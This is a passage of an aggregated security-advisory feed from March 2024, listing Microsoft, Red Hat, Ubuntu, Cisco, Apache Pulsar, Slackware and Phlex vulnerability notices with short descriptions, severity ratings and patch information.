12.03.2024 09:00:00	msrc	[MS:CVE-2024-21444] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21444
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21445] Windows USB Print Driver Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21445
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21446] NTFS Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21446
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21450] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21450
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21451] Microsoft ODBC Driver Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21451
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26197] Windows Standards-Based Storage Management Service Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26197
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26159] Microsoft ODBC Driver Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26159
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26190] Microsoft QUIC Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26190
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26198] Microsoft Exchange Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26198
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26199] Microsoft Office Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26199
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26201] Microsoft Intune Linux Agent Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26201
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26203] Azure Data Studio Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26203
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26161] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26161
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26164] Microsoft Django Backend for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26164
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21330] Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21330
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21334] Open Management Infrastructure (OMI) Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21334
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21390] Microsoft Authenticator Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21390
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21400] Microsoft Azure Kubernetes Service Confidential Container Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21400
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21407] Windows Hyper-V Remote Code Execution Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21407
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21408] Windows Hyper-V Denial of Service Vulnerability (critical)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21408
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21419] Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21419
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21427] Windows Kerberos Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21427
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21431] Hypervisor-Protected Code Integrity (HVCI) Security Feature Bypass Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21431
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21432] Windows Update Stack Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21432
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21433] Windows Print Spooler Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21433
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21434] Microsoft Windows SCSI Class System File Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21434
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21435] Windows OLE Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21435
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21436] Windows Installer Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21436
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21437] Windows Graphics Component Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21437
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21440] Microsoft ODBC Driver Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21440
12.03.2024 09:00:00	msrc	[MS:CVE-2024-21448] Microsoft Teams for Android Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21448
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26160] Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26160
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26162] Microsoft ODBC Driver Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26162
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26166] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26166
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26169] Windows Error Reporting Service Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26169
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26170] Windows Composite Image File System (CimFS) Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26170
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26173] Windows Kernel Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26173
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26174] Windows Kernel Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26174
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26176] Windows Kernel Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26176
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26177] Windows Kernel Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26177
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26178] Windows Kernel Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26178
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26181] Windows Kernel Denial of Service Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26181
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26182] Windows Kernel Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26182
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26185] Windows Compressed Folder Tampering Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26185
12.03.2024 09:00:00	msrc	[MS:CVE-2023-28746] Intel: CVE-2023-28746 Register File Data Sampling (RFDS) (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2023-28746
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26204] Outlook for Android Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26204
12.03.2024 09:00:00	msrc	[MS:CVE-2024-26165] Visual Studio Code Elevation of Privilege Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26165
12.03.2024 02:00:00	redhat	[RHSA-2024:1251] kpatch-patch security update (important)	This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1251
12.03.2024 02:00:00	redhat	[RHSA-2024:1249] kernel security and bug fix update (important)	The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* (CVE-2024-26602, ?)* kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c (CVE-2022-42896)* kernel: use-after-free in sch_qfq network scheduler (CVE-2023-4921)* kernel: IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)* kernel: fbcon: out-of-sync arrays in fbcon_mode_deleted due to wrong con2fb_map assignment (CVE-2023-38409)* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fix(es):* [rhel-7] INFO: possible circular locking dependency detected: store+0x70/0xe0 kernfs_fop_write+0xe3/0x190 (BZ#2161654)* qedf: Reading /sys/kernel/debug/qedf/hostX/stop_io_on_error can cause panic (BZ#2224973)	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1249
11.03.2024 23:19:00	amazonlinux	[ALAS2-2024-2491] Amazon Linux 2 2017.12 - ALAS2-2024-2491: medium priority package update for microcode_ctl (medium)	Package updates are available for Amazon Linux 2 that fix the following vulnerabilities:CVE-2023-39368: Protection mechanism failure of bus lock regulator for some Intel? Processors may allow an unauthenticated user to potentially enable denial of service via network access.CVE-2023-38575: Non-transparent sharing of return predictor targets between contexts in some Intel? Processors may allow an authorized user to potentially enable information disclosure via local access.	https://secdb.nttzen.cloud/security-advisory/amazonlinux/ALAS2-2024-2491
13.03.2024 22:19:27	ubuntu	[USN-6587-5] X.Org X Server vulnerabilities (critical)	Several security issues were fixed in X.Org X Server.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6587-5
13.03.2024 21:51:59	slackware	[SSA:2024-073-01] expat	New expat packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/expat-2.6.2-i586-1_slack15.0.txz: Upgraded. Prevent billion laughs attacks with isolated use of external parsers. For more information, see: https://github.com/libexpat/libexpat/commit/1d50b80cf31de87750103656f6eb693746854aa8 https://www.cve.org/CVERecord?id=CVE-2024-28757 (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/expat-2.6.2-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/expat-2.6.2-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/expat-2.6.2-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/expat-2.6.2-x86_64-1.txzMD5 signaturesSlackware 15.0 package:41fe8eed9237ced1ce28e63f76f8f1be expat-2.6.2-i586-1_slack15.0.txzSlackware x86_64 15.0 package:297e29e85be05ef6be978fdcf44de90a expat-2.6.2-x86_64-1_slack15.0.txzSlackware -current package:9c1021caaebd2c18a900f3554352e47e l/expat-2.6.2-i586-1.txzSlackware x86_64 -current package:92d7494ad4a18e39ef69aa5f549dd6e3 l/expat-2.6.2-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg expat-2.6.2-i586-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-073-01
13.03.2024 19:17:13	ubuntu	[USN-6686-2] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6686-2
13.03.2024 18:43:52	ubuntu	[USN-6681-3] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6681-3
13.03.2024 18:00:00	cisco	[CISCO-SA-XRL2VPN-JESRU3FC] Cisco IOS XR Software Layer 2 Services Denial of Service Vulnerability (high)	A vulnerability in the Layer 2 Ethernet services of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to cause the line card network processor to reset, resulting in a denial of service (DoS) condition.This vulnerability is due to the incorrect handling of specific Ethernet frames that are received on line cards that have the Layer 2 services feature enabled. An attacker could exploit this vulnerability by sending specific Ethernet frames through an affected device. A successful exploit could allow the attacker to cause the ingress interface network processor to reset, resulting in a loss of traffic over the interfaces that are supported by the network processor. Multiple resets of the network processor would cause the line card to reset, resulting in a DoS condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75299"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-XRL2VPN-JESRU3FC
13.03.2024 18:00:00	cisco	[CISCO-SA-SNMP-UHV6ZDEF] Cisco IOS XR Software SNMP Management Plane Protection ACL Bypass Vulnerability (medium)	A vulnerability in the UDP forwarding code of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to bypass configured management plane protection policies and access the Simple Network Management Plane (SNMP) server of an affected device.This vulnerability is due to incorrect UDP forwarding programming when using SNMP with management plane protection. An attacker could exploit this vulnerability by attempting to perform an SNMP operation using broadcast as the destination address that could be processed by an affected device that is configured with an SNMP server. A successful exploit could allow the attacker to communicate to the device on the configured SNMP ports. Although an unauthenticated attacker could send UDP datagrams to the configured SNMP port, only an authenticated user can retrieve or modify data using SNMP requests.Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75299"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SNMP-UHV6ZDEF
13.03.2024 18:00:00	cisco	[CISCO-SA-IOSXR-SSH-PRIVESC-EWDMKEW3] Cisco IOS XR Software SSH Privilege Escalation Vulnerability (high)	A vulnerability in the SSH client feature of Cisco IOS XR Software for Cisco 8000 Series Routers and Cisco Network Convergence System (NCS) 540 Series and 5700 Series Routers could allow an authenticated, local attacker to elevate privileges on an affected device.This vulnerability is due to insufficient validation of arguments that are included with the SSH client CLI command. An attacker with low-privileged access to an affected device could exploit this vulnerability by issuing a crafted SSH client command to the CLI. A successful exploit could allow the attacker to elevate privileges to root on the affected device.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: September 2023 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75241"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXR-SSH-PRIVESC-EWDMKEW3
13.03.2024 18:00:00	cisco	[CISCO-SA-IOSXR-SCP-DOS-KB6SUUHW] Cisco IOS XR Software Authenticated CLI Secure Copy Protocol and SFTP Denial of Service Vulnerability (medium)	A vulnerability in the Secure Copy Protocol (SCP) and SFTP feature of Cisco IOS XR Software could allow an authenticated, local attacker to create or overwrite files in a system directory, which could lead to a denial of service (DoS) condition. The attacker would require valid user credentials to perform this attack.This vulnerability is due to a lack of proper validation of SCP and SFTP CLI input parameters. An attacker could exploit this vulnerability by authenticating to the device and issuing SCP or SFTP CLI commands with specific parameters. A successful exploit could allow the attacker to impact the functionality of the device, which could lead to a DoS condition. The device may need to be manually rebooted to recover.Note: This vulnerability is exploitable only when a local user invokes SCP or SFTP commands at the Cisco IOS XR CLI. A local user with administrative privileges could exploit this vulnerability remotely.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75299"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXR-SCP-DOS-KB6SUUHW
13.03.2024 18:00:00	cisco	[CISCO-SA-IOSXR-PPPMA-JKWFGNEW] Cisco IOS XR Software for ASR 9000 Series Aggregation Services Routers PPPoE Denial of Service Vulnerability (high)	A vulnerability in the PPP over Ethernet (PPPoE) termination feature of Cisco IOS XR Software for Cisco ASR 9000 Series Aggregation Services Routers could allow an unauthenticated, adjacent attacker to crash the ppp_ma process, resulting in a denial of service (DoS) condition.This vulnerability is due to the improper handling of malformed PPPoE packets that are received on a router that is running Broadband Network Gateway (BNG) functionality with PPPoE termination on a Lightspeed-based or Lightspeed-Plus-based line card. An attacker could exploit this vulnerability by sending a crafted PPPoE packet to an affected line card interface that does not terminate PPPoE. A successful exploit could allow the attacker to crash the ppp_ma process, resulting in a DoS condition for PPPoE traffic across the router.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75299"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXR-PPPMA-JKWFGNEW
13.03.2024 18:00:00	cisco	[CISCO-SA-IOSXR-DHCP-DOS-3TGPKRDM] Cisco IOS XR Software DHCP Version 4 Server Denial of Service Vulnerability (medium)	A vulnerability in the DHCP version 4 (DHCPv4) server feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to trigger a crash of the dhcpd process, resulting in a denial of service (DoS) condition.This vulnerability exists because certain DHCPv4 messages are improperly validated when they are processed by an affected device. An attacker could exploit this vulnerability by sending a malformed DHCPv4 message to an affected device. A successful exploit could allow the attacker to cause a crash of the dhcpd process. While the dhcpd process is restarting, which may take approximately two minutes, DHCPv4 server services are unavailable on the affected device. This could temporarily prevent network access to clients that join the network during that time period and rely on the DHCPv4 server of the affected device.Notes:Only the dhcpd process crashes and eventually restarts automatically. The router does not reload.This vulnerability only applies to DHCPv4. DHCP version 6 (DHCPv6) is not affected.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the March 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75299"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXR-DHCP-DOS-3TGPKRDM
13.03.2024 18:00:00	cisco	[CISCO-SA-IOSXR-ACL-BYPASS-RZU5NL3E] Cisco IOS XR Software MPLS and Pseudowire Interfaces Access Control List Bypass Vulnerabilities (medium)	Multiple vulnerabilities in the IP access control list (ACL) processing in the ingress direction on MPLS and Pseudowire (PW) interfaces of Cisco IOS XR Software could allow an unauthenticated, remote attacker to bypass a configured ACL.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. There are workarounds that address CVE-2024-20315. There are no workarounds that address CVE-2024-20322.This advisory is part of the March 2024 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: March 2024 Semiannual Cisco IOS XR Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75299"].	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IOSXR-ACL-BYPASS-RZU5NL3E
13.03.2024 20:11:00	maven	[MAVEN:GHSA-7G97-7R3C-5CC6] In Quarkus, git credentials could be inadvertently published (low)	A vulnerability was found in Quarkus. In certain conditions related to the CI process, git credentials could be inadvertently published, which could put the git repository at risk.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7G97-7R3C-5CC6
13.03.2024 10:04:31	ubuntu	[USN-6663-2] OpenSSL update	Add implicit rejection in PKCS#1 v1.5 in OpenSSL.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6663-2
13.03.2024 02:00:00	debian	[DSA-5639-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5639-1
13.03.2024 02:00:00	redhat	[RHSA-2024:1308] .NET 7.0 security update (moderate)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.117 and .NET Runtime 7.0.17.Security Fix(es):* dotnet: DoS in .NET Core / YARP HTTP / 2 WebSocket support (CVE-2024-21392)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1308
13.03.2024 02:00:00	redhat	[RHSA-2024:1311] .NET 8.0 security update (moderate)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.103 and .NET Runtime 8.0.3.Security Fix(es):* dotnet: DoS in .NET Core / YARP HTTP / 2 WebSocket support (CVE-2024-21392)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1311
13.03.2024 02:00:00	redhat	[RHSA-2024:1309] .NET 7.0 security update (moderate)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 7.0.117 and .NET Runtime 7.0.17.Security Fix(es):* dotnet: DoS in .NET Core / YARP HTTP / 2 WebSocket support (CVE-2024-21392)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1309
13.03.2024 02:00:00	redhat	[RHSA-2024:1310] .NET 8.0 security update (moderate)	.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.103 and .NET Runtime 8.0.3.Security Fix(es):* dotnet: DoS in .NET Core / YARP HTTP / 2 WebSocket support (CVE-2024-21392)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:1310
13.03.2024 23:59:38	maven	[MAVEN:GHSA-XP2R-G8QQ-44HH] Apache Pulsar: Improper Input Validation in Pulsar Function Worker allows Remote Code Execution (high)	Improper input validation in the Pulsar Function Worker allows a malicious authenticated user to execute arbitrary Java code on the Pulsar Function worker, outside of the sandboxes designated for running user-provided functions. This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true".This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6.2.11 Pulsar Function Worker users should upgrade to at least 2.11.4.3.0 Pulsar Function Worker users should upgrade to at least 3.0.3.3.1 Pulsar Function Worker users should upgrade to at least 3.1.3.3.2 Pulsar Function Worker users should upgrade to at least 3.2.1.Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XP2R-G8QQ-44HH
13.03.2024 23:58:55	maven	[MAVEN:GHSA-C35H-W8HJ-MM55] Apache Pulsar: Improper Authentication for Pulsar Proxy Statistics Endpoint (high)	Improper Authentication vulnerability in Apache Pulsar Proxy allows an attacker to connect to the /proxy-stats endpoint without authentication. The vulnerable endpoint exposes detailed statistics about live connections, along with the capability to modify the logging level of proxied connections without requiring proper authentication credentials.This issue affects Apache Pulsar versions from 2.6.0 to 2.10.5, from 2.11.0 to 2.11.2, from 3.0.0 to 3.0.1, and 3.1.0.The known risks include exposing sensitive information such as connected client IP and unauthorized logging level manipulation which could lead to a denial-of-service condition by significantly increasing the proxy's logging overhead. When deployed via the Apache Pulsar Helm chart within Kubernetes environments, the actual client IP might not be revealed through the load balancer's default behavior, which typically obscures the original source IP addresses when externalTrafficPolicy is being configured to "Cluster" by default. The /proxy-stats endpoint contains topic level statistics, however, in the default configuration, the topic level statistics aren't known to be exposed.2.10 Pulsar Proxy users should upgrade to at least 2.10.6.2.11 Pulsar Proxy users should upgrade to at least 2.11.3.3.0 Pulsar Proxy users should upgrade to at least 3.0.2.3.1 Pulsar Proxy users should upgrade to at least 3.1.1.Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions. Additionally, it's imperative to recognize that the Apache Pulsar Proxy is not intended for direct exposure to the internet. The architectural design of Pulsar Proxy assumes that it will operate within a secured network environment, safeguarded by appropriate perimeter defenses.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-C35H-W8HJ-MM55
13.03.2024 22:40:37	maven	[MAVEN:GHSA-G627-R579-RW35] Apache Pulsar: Improper Authorization For Topic-Level Policy Management (moderate)	The vulnerability allows authenticated users with only produce or consume permissions to modify topic-level policies, such as retention, TTL, and offloading settings. These management operations should be restricted to users with the tenant admin role or super user role.This issue affects Apache Pulsar versions from 2.7.1 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Apache Pulsar users should upgrade to at least 2.10.6.2.11 Apache Pulsar users should upgrade to at least 2.11.4.3.0 Apache Pulsar users should upgrade to at least 3.0.3.3.1 Apache Pulsar users should upgrade to at least 3.1.3.3.2 Apache Pulsar users should upgrade to at least 3.2.1.Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-G627-R579-RW35
13.03.2024 09:00:00	msrc	[MS:CVE-2024-21419] Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21419
14.03.2024 00:53:09	rubysec	[RUBYSEC:PHLEX-2024-28199] Cross-site Scripting (XSS) possible with maliciously formed HTML attribute names and values in Phlex (high)	There is a potential cross-site scripting (XSS) vulnerability thatcan be exploited via maliciously crafted user data. This was dueto improper case-sensitivity in the code that was meant to preventthese attacks.### ImpactIf you render an `<a>` tag with an `href` attribute set to auser-provided link, that link could potentially execute JavaScriptwhen clicked by another user.```rubya(href: user_profile) { "Profile" }```If you splat user-provided attributes when rendering any HTML orSVG tag, malicious event attributes could be included in the output,executing JavaScript when the events are triggered by another user.```rubyh1(**JSON.parse(user_attributes))```### PatchesPatches are [available on RubyGems](https://rubygems.org/gems/phlex)for all `1.x` minor versions. The patched versions are:- [1.9.1](https://rubygems.org/gems/phlex/versions/1.9.1)- [1.8.2](https://rubygems.org/gems/phlex/versions/1.8.2)- [1.7.1](https://rubygems.org/gems/phlex/versions/1.7.1)- [1.6.2](https://rubygems.org/gems/phlex/versions/1.6.2)- [1.5.2](https://rubygems.org/gems/phlex/versions/1.5.2)- [1.4.1](https://rubygems.org/gems/phlex/versions/1.4.1)- [1.3.3](https://rubygems.org/gems/phlex/versions/1.3.3)- [1.2.2](https://rubygems.org/gems/phlex/versions/1.2.2)- [1.1.1](https://rubygems.org/gems/phlex/versions/1.1.1)- [1.0.1](https://rubygems.org/gems/phlex/versions/1.0.1)If you are on `main`, it has been patched 